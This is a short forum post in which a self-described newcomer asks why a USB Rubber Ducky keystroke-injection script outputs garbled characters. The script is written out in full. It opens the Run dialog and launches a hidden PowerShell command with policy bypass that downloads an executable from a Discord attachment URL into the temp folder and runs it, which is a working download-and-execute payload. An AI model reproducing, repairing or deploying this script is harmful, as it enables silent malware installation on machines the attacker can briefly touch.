Hello im a newb to usb rubber ducky,I received mine 4 days ago for pen testing, and I have a small problem with the STRING code.
Here the code bellow I used.
DELAY 200
CONTROL ESCAPE
DELAY 300
STRING run
DELAY 100
ENTER
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/796873244677242910/calc.exe',\"$env:temp\calc.exe\"); Start-Process \"$env:temp\calc.exe\""
ENTER
When executed in a notepad.exe ,I get this code with alot of @ and #